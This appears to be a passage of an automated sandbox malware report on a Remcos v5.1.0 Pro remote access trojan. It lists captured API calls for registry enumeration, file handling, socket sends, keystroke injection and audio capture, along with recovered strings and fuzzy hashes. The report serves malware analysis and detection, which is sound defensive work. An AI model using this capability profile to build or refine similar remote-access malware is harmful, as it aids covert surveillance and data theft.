                                                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Console$Window$AllocOutputShow
                                                                    • String ID: Remcos v$0%s$5.1.0 Pro$CONOUT$
                                                                    • API String ID: 4067487056-123686611
                                                                    • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                    • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                                                    • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                                    • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                                                    • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                                                    • Opcode Fuzzy Hash: 984f3823f0f42f82cc4a86ce7b4d37cd777ac44a74ee2f2d7e0058df0e398b64
                                                                    • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                                    APIs
                                                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 1454806937-0
                                                                    • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                    • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                    • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                    • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                    APIs
                                                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                                    • _memcmp.LIBVCRUNTIME ref: 00445423
                                                                    • _free.LIBCMT ref: 00445494
                                                                    • _free.LIBCMT ref: 004454AD
                                                                    • _free.LIBCMT ref: 004454DF
                                                                    • _free.LIBCMT ref: 004454E8
                                                                    • _free.LIBCMT ref: 004454F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorLast$_abort_memcmp
                                                                    • String ID: C
                                                                    • API String ID: 1679612858-1037565863
                                                                    • Opcode ID: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                                                    • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                                                    • Opcode Fuzzy Hash: 95a5055c0f5b4626ae5439ab0ac3d92ffbfe406232e79e21228b3c6dd4324b4e
                                                                    • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: tcp$udp
                                                                    • API String ID: 0-3725065008
                                                                    • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                    • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                                    • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                                    • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                                    APIs
                                                                    • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                    • ExitThread.KERNEL32 ref: 004018F6
                                                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                    • String ID: us$PkG$NG$NG
                                                                    • API String ID: 1649129571-1145529973
                                                                    • Opcode ID: 4753672beb5189ade67dc66fb9bad6830bb45c2efe282e304d9de69e75be12d4
                                                                    • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                                    • Opcode Fuzzy Hash: 4753672beb5189ade67dc66fb9bad6830bb45c2efe282e304d9de69e75be12d4
                                                                    • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                                    APIs
                                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                                                      • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                      • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                    • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseEnumInfoOpenQuerysend
                                                                    • String ID: hdF$xUG$NG$NG$TG
                                                                    • API String ID: 3114080316-2774981958
                                                                    • Opcode ID: d04d7e86f3e79cd80f516d97b69f9ea8ce1aa84fa4273cd8ea4fc475df299af9
                                                                    • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                                                    • Opcode Fuzzy Hash: d04d7e86f3e79cd80f516d97b69f9ea8ce1aa84fa4273cd8ea4fc475df299af9
                                                                    • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                                                      • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                                      • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                    • String ID: .part
                                                                    • API String ID: 1303771098-3499674018
                                                                    • Opcode ID: 7e3a461a4dfa83518c73b99b6d9e9bc5c8ac1e209db5eccbae19ff2f393833b1
                                                                    • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                                    • Opcode Fuzzy Hash: 7e3a461a4dfa83518c73b99b6d9e9bc5c8ac1e209db5eccbae19ff2f393833b1
                                                                    • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                                                    • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                                                    • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                                    • __freea.LIBCMT ref: 0044AE30
                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                    • __freea.LIBCMT ref: 0044AE39
                                                                    • __freea.LIBCMT ref: 0044AE5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 3864826663-0
                                                                    • Opcode ID: f133f672f31cad4c1eaa5701a27b160f43f27f2d719f30c1e4d65ec3bb2f8dff
                                                                    • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                                    • Opcode Fuzzy Hash: f133f672f31cad4c1eaa5701a27b160f43f27f2d719f30c1e4d65ec3bb2f8dff
                                                                    • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                                                    APIs
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                                                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InputSend
                                                                    • String ID:
                                                                    • API String ID: 3431551938-0
                                                                    • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                    • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                                                    • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                                    • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16_free
                                                                    • String ID: a/p$am/pm$zD
                                                                    • API String ID: 2936374016-2723203690
                                                                    • Opcode ID: ffdf125771be3930cd34b67c2c4896bc65d4a075ba9d32331fcf35df296b8716
                                                                    • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                                                    • Opcode Fuzzy Hash: ffdf125771be3930cd34b67c2c4896bc65d4a075ba9d32331fcf35df296b8716
                                                                    • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                                                    APIs
                                                                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Enum$InfoQueryValue
                                                                    • String ID: [regsplt]$xUG$TG
                                                                    • API String ID: 3554306468-1165877943
                                                                    • Opcode ID: fe1cbb41b679b2630f65ac441914b8fe9a277985efd38a274791b84c29cd69a4
                                                                    • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                                                    • Opcode Fuzzy Hash: fe1cbb41b679b2630f65ac441914b8fe9a277985efd38a274791b84c29cd69a4
                                                                    • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                                                    • __fassign.LIBCMT ref: 0044B479
                                                                    • __fassign.LIBCMT ref: 0044B494
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B4D9
                                                                    • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,?,0044BB31,?), ref: 0044B512
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                    • String ID:
                                                                    • API String ID: 1324828854-0
                                                                    • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                    • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                                    • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                    • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID: D[E$D[E
                                                                    • API String ID: 269201875-3695742444
                                                                    • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                    • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                                    • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                                    • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                                    APIs
                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,10009C07,?,00000000,?,00000000,00000000), ref: 100094D4
                                                                    • __fassign.LIBCMT ref: 1000954F
                                                                    • __fassign.LIBCMT ref: 1000956A
                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                                    • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095AF
                                                                    • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000,?,?,?,?,?,?,?,?,?,10009C07,?), ref: 100095E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
